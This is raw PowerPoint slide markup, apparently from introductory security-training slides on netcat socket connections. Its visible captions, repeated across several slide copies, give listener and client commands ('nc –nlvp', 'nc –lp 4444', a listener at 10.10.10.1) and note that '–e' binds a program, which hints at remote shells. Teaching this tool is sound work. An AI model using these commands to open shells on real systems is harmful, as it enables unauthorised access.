              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can use –e to bind a program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B51C41-FB3F-434D-98EC-4031468EFA0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10651470" y="2348986"/>
            <a:ext cx="915044" cy="897134"/>
            <a:chOff x="9806296" y="816993"/>
            <a:chExt cx="1200150" cy="1280291"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA41F9E-BC2F-9A4E-B6BA-6A46F1DDCE60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9886306" y="816993"/>
              <a:ext cx="1040130" cy="120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8D23CC-CC7F-704D-AAAB-88D686D9844F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9806296" y="897134"/>
              <a:ext cx="1200150" cy="1200150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0C9DFE-D9D0-6D48-8897-FC9AC3766549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9318812" y="1169945"/>
            <a:ext cx="917783" cy="876945"/>
            <a:chOff x="9028541" y="2937510"/>
            <a:chExt cx="2521200" cy="2409016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0527610-6D32-F446-B75C-C445BC15B9FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9028541" y="2937510"/>
              <a:ext cx="2521200" cy="24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logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B73F01-D235-C14B-A896-1F3F67CCC80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233984" y="3082266"/>
              <a:ext cx="2107120" cy="2107120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F9DBA6-625B-CB4C-B709-1B01C3FD8E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537220" y="2306063"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0A05F2-2DDA-CE43-8C5E-245461E784CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9366883" y="2099585"/>
            <a:ext cx="793764" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F82CB4-FBA6-FC48-B391-D7F680F2F376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10445861" y="3189963"/>
            <a:ext cx="1309777" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>10.10.10.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB066BA3-A2E9-4E4C-903E-55323AF35008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2721722138"/>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697425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ontent Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BFEEC4-803A-9E4A-98DF-ED7AE9C73C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="1043427"/>
            <a:ext cx="4669792" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Socket Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”Swiss Army knife of hackers”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listener (server)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [PORT no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Numeric, listener, verbose, port [port no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [IP] [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can use –e to bind a program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B51C41-FB3F-434D-98EC-4031468EFA0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10651470" y="2348986"/>
            <a:ext cx="915044" cy="897134"/>
            <a:chOff x="9806296" y="816993"/>
            <a:chExt cx="1200150" cy="1280291"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA41F9E-BC2F-9A4E-B6BA-6A46F1DDCE60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9886306" y="816993"/>
              <a:ext cx="1040130" cy="120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8D23CC-CC7F-704D-AAAB-88D686D9844F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9806296" y="897134"/>
              <a:ext cx="1200150" cy="1200150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0C9DFE-D9D0-6D48-8897-FC9AC3766549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9318812" y="1169945"/>
            <a:ext cx="917783" cy="876945"/>
            <a:chOff x="9028541" y="2937510"/>
            <a:chExt cx="2521200" cy="2409016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0527610-6D32-F446-B75C-C445BC15B9FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9028541" y="2937510"/>
              <a:ext cx="2521200" cy="24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logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B73F01-D235-C14B-A896-1F3F67CCC80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233984" y="3082266"/>
              <a:ext cx="2107120" cy="2107120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F9DBA6-625B-CB4C-B709-1B01C3FD8E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537220" y="2306063"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0A05F2-2DDA-CE43-8C5E-245461E784CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9366883" y="2099585"/>
            <a:ext cx="793764" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F82CB4-FBA6-FC48-B391-D7F680F2F376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10445861" y="3189963"/>
            <a:ext cx="1309777" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>10.10.10.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C70DCE4-70F6-A74D-9FBA-2895A0CCBEE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10516490" y="2041209"/>
            <a:ext cx="3165220" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C174F480-4425-4947-AB68-3821F6D77EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2721722138"/>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39630637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ontent Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BFEEC4-803A-9E4A-98DF-ED7AE9C73C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="1043427"/>
            <a:ext cx="4669792" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Socket Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”Swiss Army knife of hackers”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listener (server)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [PORT no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Numeric, listener, verbose, port [port no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [IP] [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can use –e to bind a program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B51C41-FB3F-434D-98EC-4031468EFA0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10651470" y="2348986"/>
            <a:ext cx="915044" cy="897134"/>
            <a:chOff x="9806296" y="816993"/>
            <a:chExt cx="1200150" cy="1280291"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rounded Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA41F9E-BC2F-9A4E-B6BA-6A46F1DDCE60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9886306" y="816993"/>
              <a:ext cx="1040130" cy="120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8D23CC-CC7F-704D-AAAB-88D686D9844F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9806296" y="897134"/>
              <a:ext cx="1200150" cy="1200150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0C9DFE-D9D0-6D48-8897-FC9AC3766549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9318812" y="1169945"/>
